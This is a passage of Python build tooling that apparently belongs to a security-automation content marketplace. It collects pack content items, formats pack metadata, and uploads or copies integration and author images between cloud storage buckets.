pack_changelog_path = os.path.join(self._pack_path, Pack.CHANGELOG_JSON)
if os.path.exists(build_changelog_index_path):
try:
shutil.copyfile(src=build_changelog_index_path, dst=pack_changelog_path)
logging.success(f"Successfully copied pack index changelog.json file from {build_changelog_index_path}"
f" to {pack_changelog_path}.")
except shutil.Error as e:
task_status = False
logging.error(f"Failed copying changelog.json file from {build_changelog_index_path} to "
f"{pack_changelog_path}. Additional info: {str(e)}")
return task_status
else:
task_status = False
logging.error(
f"{self._pack_name} index changelog file is missing in build bucket path: {build_changelog_index_path}")
return task_status and self.is_changelog_exists()
def collect_content_items(self):
""" Iterates over content items folders inside pack and collects content items data.
Returns:
dict: Parsed content items
.
"""
task_status = False
content_items_result: dict = {}
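# the collected result maps content item display keys to lists of item summaries, e.g.
# {"integration": [{"id": ..., "name": ..., ...}], "playbook": [...]}; the keys come from
# content_item_name_mapping defined below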
try:
# the format is defined in issue #19786, may change in the future
content_item_name_mapping = {
PackFolders.SCRIPTS.value: "automation",
PackFolders.PLAYBOOKS.value: "playbook",
PackFolders.INTEGRATIONS.value: "integration",
PackFolders.INCIDENT_FIELDS.value: "incidentfield",
PackFolders.INCIDENT_TYPES.value: "incidenttype",
PackFolders.DASHBOARDS.value: "dashboard",
PackFolders.INDICATOR_FIELDS.value: "indicatorfield",
PackFolders.REPORTS.value: "report",
PackFolders.INDICATOR_TYPES.value: "reputation",
PackFolders.LAYOUTS.value: "layoutscontainer",
PackFolders.CLASSIFIERS.value: "classifier",
PackFolders.WIDGETS.value: "widget",
PackFolders.GENERIC_DEFINITIONS.value: "genericdefinition",
PackFolders.GENERIC_FIELDS.value: "genericfield",
PackFolders.GENERIC_MODULES.value: "genericmodule",
PackFolders.GENERIC_TYPES.value: "generictype",
PackFolders.LISTS.value: "list",
PackFolders.PREPROCESS_RULES.value: "preprocessrule",
PackFolders.JOBS.value: "job",
}
for root, pack_dirs, pack_files_names in os.walk(self._pack_path, topdown=False):
current_directory = root.split(os.path.sep)[-1]
parent_directory = root.split(os.path.sep)[-2]
if parent_directory in [PackFolders.GENERIC_TYPES.value, PackFolders.GENERIC_FIELDS.value]:
current_directory = parent_directory
elif current_directory in [PackFolders.GENERIC_TYPES.value, PackFolders.GENERIC_FIELDS.value]:
continue
folder_collected_items = []
for pack_file_name in pack_files_names:
if not pack_file_name.endswith(('.json', '.yml')):
continue
pack_file_path = os.path.join(root, pack_file_name)
# reputation files in the old format aren't supported in server version 6.0.0 and above
if current_directory == PackFolders.INDICATOR_TYPES.value \
and not fnmatch.fnmatch(pack_file_name, 'reputation-*.json'):
os.remove(pack_file_path)
logging.info(f"Deleted pack {pack_file_name} reputation file for {self._pack_name} pack")
continue
with open(pack_file_path, 'r') as pack_file:
if current_directory in PackFolders.yml_supported_folders():
content_item = yaml.safe_load(pack_file)
elif current_directory in PackFolders.json_supported_folders():
content_item = json.load(pack_file)
else:
continue
# check if the content item has a toversion field
to_version = content_item.get('toversion') or content_item.get('toVersion')
if to_version and LooseVersion(to_version) < LooseVersion(Metadata.SERVER_DEFAULT_MIN_VERSION):
os.remove(pack_file_path)
logging.info(
f"{self._pack_name} pack content item {pack_file_name} has to version: {to_version}. "
f"{pack_file_name} file was deleted.")
continue
if current_directory not in PackFolders.pack_displayed_items():
continue # skip content items that are not displayed in contentItems
logging.debug(
f"Iterating over {pack_file_path} file and collecting items of {self._pack_name} pack")
# update the minimum server version based on the current content item
self._server_min_version = get_updated_server_version(self._server_min_version, content_item,
self._pack_name)
content_item_tags = content_item.get('tags', [])
if current_directory == PackFolders.SCRIPTS.value:
folder_collected_items.append({
'id': content_item.get('commonfields', {}).get('id', ''),
'name': content_item.get('name', ''),
'description': content_item.get('comment', ''),
'tags': content_item_tags,
})
if not self._contains_transformer and 'transformer' in content_item_tags:
self._contains_transformer = True
if not self._contains_filter and 'filter' in content_item_tags:
self._contains_filter = True
elif current_directory == PackFolders.PLAYBOOKS.value:
self.is_feed_pack(content_item, 'Playbook')
folder_collected_items.append({
'id': content_item.get('id', ''),
'name': content_item.get('name', ''),
'description': content_item.get('description', ''),
})
elif current_directory == PackFolders.INTEGRATIONS.value:
integration_commands = content_item.get('script', {}).get('commands', [])
self.is_feed_pack(content_item, 'Integration')
folder_collected_items.append({
'id': content_item.get('commonfields', {}).get('id', ''),
'name': content_item.get('display', ''),
'description': content_item.get('description', ''),
'category': content_item.get('category', ''),
'commands': [
{'name': c.get('name', ''), 'description': c.get('description', '')}
for c in integration_commands],
})
elif current_directory == PackFolders.INCIDENT_FIELDS.value:
folder_collected_items.append({
'id': content_item.get('id', ''),
'name': content_item.get('name', ''),
'type': content_item.get('type', ''),
'description': content_item.get('description', ''),
})
elif current_directory == PackFolders.INCIDENT_TYPES.value:
folder_collected_items.append({
'id': content_item.get('id', ''),
'name': content_item.get('name', ''),
'playbook': content_item.get('playbookId', ''),
'closureScript': content_item.get('closureScript', ''),
'hours': int(content_item.get('hours', 0)),
'days': int(content_item.get('days', 0)),
'weeks': int(content_item.get('weeks', 0)),
})
elif current_directory == PackFolders.DASHBOARDS.value:
folder_collected_items.append({
'id': content_item.get('id', ''),
'name': content_item.get('name', ''),
})
elif current_directory == PackFolders.INDICATOR_FIELDS.value:
folder_collected_items.append({
'id': content_item.get('id', ''),
'name': content_item.get('name', ''),
'type': content_item.get('type', ''),
'description': content_item.get('description', ''),
})
elif current_directory == PackFolders.REPORTS.value:
folder_collected_items.append({
'id': content_item.get('id', ''),
'name': content_item.get('name', ''),
'description': content_item.get('description', ''),
})
elif current_directory == PackFolders.INDICATOR_TYPES.value:
folder_collected_items.append({
'id': content_item.get('id', ''),
'details': content_item.get('details', ''),
'reputationScriptName': content_item.get('reputationScriptName', ''),
'enhancementScriptNames': content_item.get('enhancementScriptNames', []),
})
elif current_directory == PackFolders.LAYOUTS.value:
layout_metadata = {
'id': content_item.get('id', ''),
'name': content_item.get('name', ''),
}
layout_description = content_item.get('description')
if layout_description is not None:
layout_metadata['description'] = layout_description
folder_collected_items.append(layout_metadata)
elif current_directory == PackFolders.CLASSIFIERS.value:
folder_collected_items.append({
'id': content_item.get('id', ''),
'name': content_item.get('name') or content_item.get('id', ''),
'description': content_item.get('description', ''),
})
elif current_directory == PackFolders.WIDGETS.value:
folder_collected_items.append({
'id': content_item.get('id', ''),
'name': content_item.get('name', ''),
'dataType': content_item.get('dataType', ''),
'widgetType': content_item.get('widgetType', ''),
})
elif current_directory == PackFolders.LISTS.value:
folder_collected_items.append({
'id': content_item.get('id', ''),
'name': content_item.get('name', '')
})
elif current_directory == PackFolders.GENERIC_DEFINITIONS.value:
folder_collected_items.append({
'id': content_item.get('id', ''),
'name': content_item.get('name', ''),
'description': content_item.get('description', ''),
})
elif parent_directory == PackFolders.GENERIC_FIELDS.value:
folder_collected_items.append({
'id': content_item.get('id', ''),
'name': content_item.get('name', ''),
'description': content_item.get('description', ''),
'type': content_item.get('type', ''),
})
elif current_directory == PackFolders.GENERIC_MODULES.value:
folder_collected_items.append({
'id': content_item.get('id', ''),
'name': content_item.get('name', ''),
'description': content_item.get('description', ''),
})
elif parent_directory == PackFolders.GENERIC_TYPES.value:
folder_collected_items.append({
'id': content_item.get('id', ''),
'name': content_item.get('name', ''),
'description': content_item.get('description', ''),
})
elif current_directory == PackFolders.PREPROCESS_RULES.value:
folder_collected_items.append({
'id': content_item.get('id', ''),
'name': content_item.get('name', ''),
'description': content_item.get('description', ''),
})
elif current_directory == PackFolders.JOBS.value:
folder_collected_items.append({
'id': content_item.get('id', ''),
# note that `name` may technically be blank, but shouldn't pass validations
'name': content_item.get('name', ''),
'details': content_item.get('details', ''),
})
if current_directory in PackFolders.pack_displayed_items():
content_item_key = content_item_name_mapping[current_directory]
content_items_result[content_item_key] = \
content_items_result.get(content_item_key, []) + folder_collected_items
logging.success(f"Finished collecting content items for {self._pack_name} pack")
task_status = True
except Exception:
logging.exception(f"Failed collecting content items in {self._pack_name} pack")
finally:
self._content_items = content_items_result
return task_status
def load_user_metadata(self):
""" Loads user defined metadata and stores part of it's data in defined properties fields.
Returns:
bool: whether the operation succeeded.
"""
task_status = False
user_metadata = {}
try:
user_metadata_path = os.path.join(self._pack_path, Pack.USER_METADATA) # user metadata path before parsing
if not os.path.exists(user_metadata_path):
logging.error(f"{self._pack_name} pack is missing {Pack.USER_METADATA} file.")
return task_status
with open(user_metadata_path, "r") as user_metadata_file:
user_metadata = json.load(user_metadata_file) # loading user metadata
# some old packs are initialized with an empty list
user_metadata = {} if isinstance(user_metadata, list) else user_metadata
# store important user metadata fields
self.support_type = user_metadata.get(Metadata.SUPPORT, Metadata.XSOAR_SUPPORT)
self.current_version = user_metadata.get(Metadata.CURRENT_VERSION, '')
self.hidden = user_metadata.get(Metadata.HIDDEN, False)
self.description = user_metadata.get(Metadata.DESCRIPTION, False)
self.display_name = user_metadata.get(Metadata.NAME, '') # type: ignore[misc]
self._user_metadata = user_metadata
self.eula_link = user_metadata.get(Metadata.EULA_LINK, Metadata.EULA_URL)
logging.info(f"Finished loading {self._pack_name} pack user metadata")
task_status = True
except Exception:
logging.exception(f"Failed in loading {self._pack_name} user metadata.")
finally:
return task_status
def _collect_pack_tags(self, user_metadata, landing_page_sections, trending_packs):
tags = set(input_to_list(input_data=user_metadata.get('tags')))
tags |= self._get_tags_from_landing_page(landing_page_sections)
tags |= {PackTags.TIM} if self._is_feed else set()
tags |= {PackTags.USE_CASE} if self._use_cases else set()
tags |= {PackTags.TRANSFORMER} if self._contains_transformer else set()
tags |= {PackTags.FILTER} if self._contains_filter else set()
if self._create_date:
days_since_creation = (datetime.utcnow() - datetime.strptime(self._create_date, Metadata.DATE_FORMAT)).days
if days_since_creation <= 30:
tags |= {PackTags.NEW}
else:
tags -= {PackTags.NEW}
if trending_packs:
if self._pack_name in trending_packs:
tags |= {PackTags.TRENDING}
else:
tags -= {PackTags.TRENDING}
return tags
def _enhance_pack_attributes(self, index_folder_path, pack_was_modified,
dependencies_data, statistics_handler=None, format_dependencies_only=False):
""" Enhances the pack object with attributes for the metadata file
Args:
index_folder_path (str): downloaded index folder directory path.
pack_was_modified (bool): whether the pack was modified or not.
dependencies_data (dict): mapping of pack dependencies data, of all levels.
statistics_handler (StatisticsHandler): the marketplace statistics handler, used for public packs.
format_dependencies_only (bool): Indicates whether the metadata formation is just for formatting the
dependencies or not.
Returns:
None: the parsed pack attributes are set on the instance.
"""
landing_page_sections = mp_statistics.StatisticsHandler.get_landing_page_sections()
displayed_dependencies = self.user_metadata.get(Metadata.DISPLAYED_IMAGES, [])
trending_packs = None
pack_dependencies_by_download_count = displayed_dependencies
if not format_dependencies_only:
# ===== Pack Regular Attributes =====
self._support_type = self.user_metadata.get(Metadata.SUPPORT, Metadata.XSOAR_SUPPORT)
self._support_details = self._create_support_section(
support_type=self._support_type, support_url=self.user_metadata.get(Metadata.URL),
support_email=self.user_metadata.get(Metadata.EMAIL)
)
self._author = self._get_author(
support_type=self._support_type, author=self.user_metadata.get(Metadata.AUTHOR, ''))
self._certification = self._get_certification(
support_type=self._support_type, certification=self.user_metadata.get(Metadata.CERTIFICATION)
)
self._legacy = self.user_metadata.get(Metadata.LEGACY, True)
self._create_date = self._get_pack_creation_date(index_folder_path)
self._update_date = self._get_pack_update_date(index_folder_path, pack_was_modified)
self._use_cases = input_to_list(input_data=self.user_metadata.get(Metadata.USE_CASES), capitalize_input=True)
self._categories = input_to_list(input_data=self.user_metadata.get(Metadata.CATEGORIES), capitalize_input=True)
self._keywords = input_to_list(self.user_metadata.get(Metadata.KEY_WORDS))
self._dependencies = self._parse_pack_dependencies(
self.user_metadata.get(Metadata.DEPENDENCIES, {}), dependencies_data)
# ===== Pack Private Attributes =====
if not format_dependencies_only:
self._is_private_pack = Metadata.PARTNER_ID in self.user_metadata
self._is_premium = self._is_private_pack
self._preview_only = get_valid_bool(self.user_metadata.get(Metadata.PREVIEW_ONLY, False))
self._price = convert_price(pack_id=self._pack_name, price_value_input=self.user_metadata.get('price'))
if self._is_private_pack:
self._vendor_id = self.user_metadata.get(Metadata.VENDOR_ID, "")
self._partner_id = self.user_metadata.get(Metadata.PARTNER_ID, "")
self._partner_name = self.user_metadata.get(Metadata.PARTNER_NAME, "")
self._content_commit_hash = self.user_metadata.get(Metadata.CONTENT_COMMIT_HASH, "")
# Currently all content packs are legacy.
# Since premium packs cannot be legacy, we directly set this attribute to false.
self._legacy = False
# ===== Pack Statistics Attributes =====
if not self._is_private_pack and statistics_handler: # Public Content case
self._pack_statistics_handler = mp_statistics.PackStatisticsHandler(
self._pack_name, statistics_handler.packs_statistics_df, statistics_handler.packs_download_count_desc,
displayed_dependencies
)
self._downloads_count = self._pack_statistics_handler.download_count
trending_packs = statistics_handler.trending_packs
pack_dependencies_by_download_count = self._pack_statistics_handler.displayed_dependencies_sorted
self._tags = self._collect_pack_tags(self.user_metadata, landing_page_sections, trending_packs)
self._search_rank = mp_statistics.PackStatisticsHandler.calculate_search_rank(
tags=self._tags, certification=self._certification, content_items=self._content_items
)
self._related_integration_images = self._get_all_pack_images(
self._displayed_integration_images, displayed_dependencies, dependencies_data,
pack_dependencies_by_download_count
)
def format_metadata(self, index_folder_path, packs_dependencies_mapping, build_number, commit_hash,
pack_was_modified, statistics_handler, pack_names=None, format_dependencies_only=False):
""" Re-formats metadata according to marketplace metadata format defined in issue #19786 and writes back
the result.
Args:
index_folder_path (str): downloaded index folder directory path.
packs_dependencies_mapping (dict): all packs dependencies lookup mapping.
build_number (str): circleCI build number.
commit_hash (str): current commit hash.
pack_was_modified (bool): Indicates whether the pack was modified or not.
statistics_handler (StatisticsHandler): The marketplace statistics handler
pack_names (set): List of all packs.
format_dependencies_only (bool): Indicates whether the metadata formation is just for formatting the
dependencies or not.
Returns:
bool: True is returned in case metadata file was parsed successfully, otherwise False.
bool: True is returned if the pack is missing dependencies.
"""
task_status = False
pack_names = pack_names if pack_names else []
is_missing_dependencies = False
try:
self.set_pack_dependencies(packs_dependencies_mapping)
if Metadata.DISPLAYED_IMAGES not in self.user_metadata and self._user_metadata:
self._user_metadata[Metadata.DISPLAYED_IMAGES] = packs_dependencies_mapping.get(
self._pack_name, {}).get(Metadata.DISPLAYED_IMAGES, [])
logging.info(f"Adding auto generated display images for {self._pack_name} pack")
dependencies_data, is_missing_dependencies = \
self._load_pack_dependencies(index_folder_path, pack_names)
self._enhance_pack_attributes(
index_folder_path, pack_was_modified, dependencies_data, statistics_handler,
format_dependencies_only
)
formatted_metadata = self._parse_pack_metadata(build_number, commit_hash)
metadata_path = os.path.join(self._pack_path, Pack.METADATA) # deployed metadata path after parsing
json_write(metadata_path, formatted_metadata) # writing back parsed metadata
logging.success(f"Finished formatting {self._pack_name} packs's {Pack.METADATA} {metadata_path} file.")
task_status = True
except Exception as e:
logging.exception(f"Failed in formatting {self._pack_name} pack metadata. Additional Info: {str(e)}")
finally:
return task_status, is_missing_dependencies
@staticmethod
def pack_created_in_time_delta(pack_name, time_delta: timedelta, index_folder_path: str) -> bool:
"""
Checks whether the pack was created within the time delta specified in the 'time_delta' argument and returns
a boolean accordingly.
Args:
pack_name: the pack name.
time_delta: time_delta to check if pack was created before.
index_folder_path: downloaded index folder directory path.
Returns:
True if the pack was created within the time_delta from now, and False otherwise.
"""
pack_creation_time_str = Pack._calculate_pack_creation_date(pack_name, index_folder_path)
return datetime.utcnow() - datetime.strptime(pack_creation_time_str, Metadata.DATE_FORMAT) < time_delta
def _get_pack_creation_date(self, index_folder_path):
return self._calculate_pack_creation_date(self._pack_name, index_folder_path)
@staticmethod
def _calculate_pack_creation_date(pack_name, index_folder_path):
""" Gets the pack created date.
Args:
pack_name (str): the pack name.
index_folder_path (str): downloaded index folder directory path.
Returns:
str: Pack creation date string, formatted according to Metadata.DATE_FORMAT.
"""
created_time = datetime.utcnow().strftime(Metadata.DATE_FORMAT)
metadata = load_json(os.path.join(index_folder_path, pack_name, Pack.METADATA))
if metadata:
if metadata.get(Metadata.CREATED):
created_time = metadata.get(Metadata.CREATED, '')
else:
raise Exception(f'The metadata file of the {pack_name} pack does not contain "{Metadata.CREATED}" time')
return created_time
def _get_pack_update_date(self, index_folder_path, pack_was_modified):
""" Gets the pack update date.
Args:
index_folder_path (str): downloaded index folder directory path.
pack_was_modified (bool): whether the pack was modified or not.
Returns:
str: Pack update date string, formatted according to Metadata.DATE_FORMAT.
"""
latest_changelog_released_date = datetime.utcnow().strftime(Metadata.DATE_FORMAT)
changelog = load_json(os.path.join(index_folder_path, self._pack_name, Pack.CHANGELOG_JSON))
if changelog and not pack_was_modified:
packs_latest_release_notes = max(LooseVersion(ver) for ver in changelog)
latest_changelog_version = changelog.get(packs_latest_release_notes.vstring, {})
latest_changelog_released_date = latest_changelog_version.get('released')
return latest_changelog_released_date
def set_pack_dependencies(self, packs_dependencies_mapping):
pack_dependencies = packs_dependencies_mapping.get(self._pack_name, {}).get(Metadata.DEPENDENCIES, {})
if Metadata.DEPENDENCIES not in self.user_metadata and self._user_metadata:
self._user_metadata[Metadata.DEPENDENCIES] = {}
# If it is a core pack, check that no new mandatory packs (that are not core packs) were added
# They can be overridden in the user metadata to be not mandatory so we need to check there as well
if self._pack_name in GCPConfig.CORE_PACKS_LIST:
mandatory_dependencies = [k for k, v in pack_dependencies.items()
if v.get(Metadata.MANDATORY, False) is True
and k not in GCPConfig.CORE_PACKS_LIST
and k not in self.user_metadata[Metadata.DEPENDENCIES].keys()]
if mandatory_dependencies:
raise Exception(f'New mandatory dependencies {mandatory_dependencies} were '
f'found in the core pack {self._pack_name}')
pack_dependencies.update(self.user_metadata[Metadata.DEPENDENCIES])
if self._user_metadata:
self._user_metadata[Metadata.DEPENDENCIES] = pack_dependencies
def prepare_for_index_upload(self):
""" Removes and leaves only necessary files in pack folder.
Returns:
bool: whether the operation succeeded.
"""
task_status = False
files_to_leave = [Pack.METADATA, Pack.CHANGELOG_JSON, Pack.README]
try:
for file_or_folder in os.listdir(self._pack_path):
files_or_folder_path = os.path.join(self._pack_path, file_or_folder)
if file_or_folder in files_to_leave:
continue
if os.path.isdir(files_or_folder_path):
shutil.rmtree(files_or_folder_path)
else:
os.remove(files_or_folder_path)
task_status = True
except Exception:
logging.exception(f"Failed in preparing index for upload in {self._pack_name} pack.")
finally:
return task_status
@staticmethod
def _get_spitted_yml_image_data(root, target_folder_files):
""" Retrieves pack integration image and integration display name and returns binding image data.
Args:
root (str): full path to the target folder to search integration image.
target_folder_files (list): list of files inside the targeted folder.
Returns:
dict: path to integration image and display name of the integration.
"""
image_data = {}
for pack_file in target_folder_files:
if pack_file.startswith('.'):
continue
if pack_file.endswith('_image.png'):
image_data['repo_image_path'] = os.path.join(root, pack_file)
elif pack_file.endswith('.yml'):
with open(os.path.join(root, pack_file), 'r') as integration_file:
integration_yml = yaml.safe_load(integration_file)
image_data['display_name'] = integration_yml.get('display', '')
return image_data
def _get_image_data_from_yml(self, pack_file_path):
""" Creates temporary image file and retrieves integration display name.
Args:
pack_file_path (str): full path to the target yml_path integration yml to search integration image.
Returns:
dict: path to temporary integration image, display name of the integrations and the basename of
the integration in content_pack.zip.
"""
image_data = {}
if pack_file_path.endswith('.yml'):
with open(pack_file_path, 'r') as integration_file:
integration_yml = yaml.safe_load(integration_file)
image_data['display_name'] = integration_yml.get('display', '')
# create temporary file of base64 decoded data
integration_name = integration_yml.get('name', '')
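# the yml 'image' field is a data URI such as "data:image/png;base64,iVBOR..." - only the base64
# payload after the comma is kept and decoded below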
base64_image = integration_yml['image'].split(',')[1] if integration_yml.get('image') else None
if not base64_image:
logging.warning(f"{integration_name} integration image was not found in {self._pack_name} pack")
return {}
temp_image_name = f'{integration_name.replace(" ", "")}_image.png'
temp_image_path = os.path.join(self._pack_path, temp_image_name)
with open(temp_image_path, 'wb') as image_file:
image_file.write(base64.b64decode(base64_image))
self._remove_files_list.append(temp_image_name) # add temporary file to tracking list
image_data['image_path'] = temp_image_path
image_data['integration_path_basename'] = os.path.basename(pack_file_path)
logging.info(f"Created temporary integration {image_data['display_name']} image for {self._pack_name} pack")
return image_data
def _search_for_images(self, target_folder):
""" Searches for png files in targeted folder.
Args:
target_folder (str): full path to directory to search.
Returns:
list: list of dictionaries that include image path and display name of integration, example:
[{'image_path': image_path, 'display_name': integration_display_name},...]
"""
target_folder_path = os.path.join(self._pack_path, target_folder)
images_list = []
if os.path.exists(target_folder_path):
for pack_item in os.scandir(target_folder_path):
image_data = self._get_image_data_from_yml(pack_item.path)
if image_data and image_data not in images_list:
images_list.append(image_data)
return images_list
def check_if_exists_in_index(self, index_folder_path):
""" Checks if pack is sub-folder of downloaded index.
Args:
index_folder_path (str): index folder full path.
Returns:
bool: whether the operation succeeded.
bool: whether pack exists in index folder.
"""
task_status, exists_in_index = False, False
try:
if not os.path.exists(index_folder_path):
logging.error(f"{GCPConfig.INDEX_NAME} does not exists.")
return task_status, exists_in_index
exists_in_index = os.path.exists(os.path.join(index_folder_path, self._pack_name))
task_status = True
except Exception:
logging.exception(f"Failed searching {self._pack_name} pack in {GCPConfig.INDEX_NAME}")
finally:
return task_status, exists_in_index
@staticmethod
def remove_contrib_suffix_from_name(display_name: str) -> str:
""" Removes the contribution details suffix from the integration's display name
Args:
display_name (str): The integration display name.
Returns:
str: The display name without the contrib details suffix
"""
contribution_suffixes = ('(Partner Contribution)', '(Developer Contribution)', '(Community Contribution)')
for suffix in contribution_suffixes:
index = display_name.find(suffix)
if index != -1:
display_name = display_name[:index].rstrip(' ')
break
return display_name
@staticmethod
def need_to_upload_integration_image(image_data: dict, integration_dirs: list, unified_integrations: list):
""" Checks whether needs to upload the integration image or not.
We upload in one of the two cases:
1. The integration_path_basename is one of the integration dirs detected
2. The integration_path_basename is one of the added/modified unified integrations
Args:
image_data (dict): path to temporary integration image, display name of the integrations and the basename of
the integration in content_pack.zip.
integration_dirs (list): The list of integrations to search in for images
unified_integrations (list): The list of unified integrations to upload their image
Returns:
bool: True if we need to upload the image or not
"""
integration_path_basename = image_data['integration_path_basename']
return any([
re.findall(BucketUploadFlow.INTEGRATION_DIR_REGEX, integration_path_basename)[0] in integration_dirs,
integration_path_basename in unified_integrations
])
def upload_integration_images(self, storage_bucket, storage_base_path, diff_files_list=None, detect_changes=False):
""" Uploads pack integrations images to gcs.
The structure of the returned integration section is defined in issue #19786.
Args:
storage_bucket (google.cloud.storage.bucket.Bucket): google storage bucket where the images will be uploaded.
storage_base_path (str): the path under the bucket to upload to.
diff_files_list (list): The list of all modified/added files found in the diff.
detect_changes (bool): Whether to detect changes or upload all images in any case.
Returns:
bool: whether the operation succeeded. The collected integration images data is stored on the instance.
"""
task_status = True
integration_images = []
integration_dirs = []
unified_integrations = []
try:
if detect_changes:
# detect added/modified integration images
for file in diff_files_list:
if self.is_integration_image(file.a_path):
# integration dir name will show up in the unified integration file path in content_packs.zip
integration_dirs.append(os.path.basename(os.path.dirname(file.a_path)))
elif self.is_unified_integration(file.a_path):
# if the file found in the diff is a unified integration we upload its image
unified_integrations.append(os.path.basename(file.a_path))
pack_local_images = self._search_for_images(target_folder=PackFolders.INTEGRATIONS.value)
if not pack_local_images:
return True # no images were found, nothing to upload
pack_storage_root_path = os.path.join(storage_base_path, self._pack_name)
for image_data in pack_local_images:
image_path = image_data.get('image_path')
if not image_path:
raise Exception(f"{self._pack_name} pack integration image was not found")
image_name = os.path.basename(image_path)
image_storage_path = os.path.join(pack_storage_root_path, image_name)
pack_image_blob = storage_bucket.blob(image_storage_path)
if not detect_changes or \
self.need_to_upload_integration_image(image_data, integration_dirs, unified_integrations):
# upload the image if needed
logging.info(f"Uploading image: {image_name} of integration: {image_data.get('display_name')} "
f"from pack: {self._pack_name}")
with open(image_path, "rb") as image_file:
pack_image_blob.upload_from_file(image_file)
self._uploaded_integration_images.append(image_name)
if GCPConfig.USE_GCS_RELATIVE_PATH:
image_gcs_path = urllib.parse.quote(
os.path.join(GCPConfig.IMAGES_BASE_PATH, self._pack_name, image_name))
else:
image_gcs_path = pack_image_blob.public_url
integration_name = image_data.get('display_name', '')
if self.support_type != Metadata.XSOAR_SUPPORT:
integration_name = self.remove_contrib_suffix_from_name(integration_name)
integration_images.append({
'name': integration_name,
'imagePath': image_gcs_path
})
if self._uploaded_integration_images:
logging.info(f"Uploaded {len(self._uploaded_integration_images)} images for {self._pack_name} pack.")
except Exception as e:
task_status = False
logging.exception(f"Failed to upload {self._pack_name} pack integration images. Additional Info: {str(e)}")
finally:
self._displayed_integration_images = integration_images
return task_status
def copy_integration_images(self, production_bucket, build_bucket, images_data, storage_base_path, build_bucket_base_path):
""" Copies all pack's integration images from the build bucket to the production bucket
Args:
production_bucket (google.cloud.storage.bucket.Bucket): The production bucket
build_bucket (google.cloud.storage.bucket.Bucket): The build bucket
images_data (dict): The images data structure from Prepare Content step
storage_base_path (str): The path under the production bucket to copy to
build_bucket_base_path (str): The path under the build bucket to copy from
Returns:
bool: Whether the operation succeeded.
"""
task_status = True
num_copied_images = 0
err_msg = f"Failed copying {self._pack_name} pack integrations images."
pc_uploaded_integration_images = images_data.get(self._pack_name, {}).get(BucketUploadFlow.INTEGRATIONS, [])
for image_name in pc_uploaded_integration_images:
build_bucket_image_path = os.path.join(build_bucket_base_path, self._pack_name, image_name)
build_bucket_image_blob = build_bucket.blob(build_bucket_image_path)
if not build_bucket_image_blob.exists():
logging.error(f"Found changed/added integration image {image_name} in content repo but "
f"{build_bucket_image_path} does not exist in build bucket")
task_status = False
else:
logging.info(f"Copying {self._pack_name} pack integration image: {image_name}")
try:
copied_blob = build_bucket.copy_blob(
blob=build_bucket_image_blob, destination_bucket=production_bucket,
new_name=os.path.join(storage_base_path, self._pack_name, image_name)
)
if not copied_blob.exists():
logging.error(f"Copy {self._pack_name} integration image: {build_bucket_image_blob.name} "
f"blob to {copied_blob.name} blob failed.")
task_status = False
else:
num_copied_images += 1
except Exception as e:
logging.exception(f"{err_msg}. Additional Info: {str(e)}")
return False
if not task_status:
logging.error(err_msg)
else:
if num_copied_images == 0:
logging.info(f"No added/modified integration images were detected in {self._pack_name} pack.")
else:
logging.success(f"Copied {num_copied_images} images for {self._pack_name} pack.")
return task_status
def upload_author_image(self, storage_bucket, storage_base_path, diff_files_list=None, detect_changes=False):
""" Uploads pack author image to gcs.
Searches for `Author_image.png` and uploads author image to gcs. In case no such image was found,
default Base pack image path is used and its gcp path is returned.
Args:
storage_bucket (google.cloud.storage.bucket.Bucket): gcs bucket where author image will be uploaded.
storage_base_path (str): the path under the bucket to upload to.
diff_files_list (list): The list of all modified/added files found in the diff
detect_changes (bool): Whether to detect changes or upload the author image in any case.
Returns:
bool: whether the operation succeeded. The resolved author image gcp path is stored on the instance.
"""
task_status = True
author_image_storage_path = ""
try:
author_image_path = os.path.join(self._pack_path, Pack.AUTHOR_IMAGE_NAME) # disable-secrets-detection
if os.path.exists(author_image_path):
image_to_upload_storage_path = os.path.join(storage_base_path, self._pack_name,
Pack.AUTHOR_IMAGE_NAME) # disable-secrets-detection
pack_author_image_blob = storage_bucket.blob(image_to_upload_storage_path)
if not detect_changes or any(self.is_author_image(file.a_path) for file in diff_files_list):
# upload the image if needed
with open(author_image_path, "rb") as author_image_file:
pack_author_image_blob.upload_from_file(author_image_file)
self._uploaded_author_image = True
logging.success(f"Uploaded successfully {self._pack_name} pack author image")
if GCPConfig.USE_GCS_RELATIVE_PATH:
author_image_storage_path = urllib.parse.quote(
os.path.join(GCPConfig.IMAGES_BASE_PATH, self._pack_name, Pack.AUTHOR_IMAGE_NAME))
else:
author_image_storage_path = pack_author_image_blob.public_url
elif self.support_type == Metadata.XSOAR_SUPPORT: # use default Base pack image for xsoar supported packs
author_image_storage_path = os.path.join(GCPConfig.IMAGES_BASE_PATH, GCPConfig.BASE_PACK,
Pack.AUTHOR_IMAGE_NAME) # disable-secrets-detection
if not GCPConfig.USE_GCS_RELATIVE_PATH:
# disable-secrets-detection-start
author_image_storage_path = os.path.join(GCPConfig.GCS_PUBLIC_URL, storage_bucket.name,
author_image_storage_path)
# disable-secrets-detection-end
logging.info((f"Skipping uploading of {self._pack_name} pack author image "
f"and use default {GCPConfig.BASE_PACK} pack image"))
else:
logging.info(f"Skipping uploading of {self._pack_name} pack author image. "
f"The pack is defined as {self.support_type} support type")
except Exception:
logging.exception(f"Failed uploading {self._pack_name} pack author image.")
task_status = False
author_image_storage_path = ""
finally:
self._author_image = author_image_storage_path
return task_status
def copy_author_image(self, production_bucket, build_bucket, images_data, storage_base_path, build_bucket_base_path):
""" Copies pack's author image from the build bucket to the production bucket
Searches for `Author_image.png`. In case no such image was found, the default Base pack image path is used and
its gcp path is returned.
Args:
production_bucket (google.cloud.storage.bucket.Bucket): The production bucket
build_bucket (google.cloud.storage.bucket.Bucket): The build bucket
images_data (dict): The images data structure from Prepare Content step
storage_base_path (str): The path under the production bucket to copy to
build_bucket_base_path (str): The path under the build bucket to copy from
Returns:
bool: Whether the operation succeeded.
"""
if images_data.get(self._pack_name, {}).get(BucketUploadFlow.AUTHOR, False):
build_author_image_path = os.path.join(build_bucket_base_path, self._pack_name, Pack.AUTHOR_IMAGE_NAME)
build_author_image_blob = build_bucket.blob(build_author_image_path)
if build_author_image_blob.exists():
try:
copied_blob = build_bucket.copy_blob(
blob=build_author_image_blob, destination_bucket=production_bucket,
new_name=os.path.join(storage_base_path, self._pack_name,
Pack.AUTHOR_IMAGE_NAME))
if not copied_blob.exists():
logging.error(f"Failed copying {self._pack_name} pack author image.")
return False
else:
logging.success(f"Copied successfully {self._pack_name} pack author image.")
return True
except Exception as e:
logging.exception(f"Failed copying {Pack.AUTHOR_IMAGE_NAME} for {self._pack_name} pack. "
f"Additional Info: {str(e)}")
return False
else:
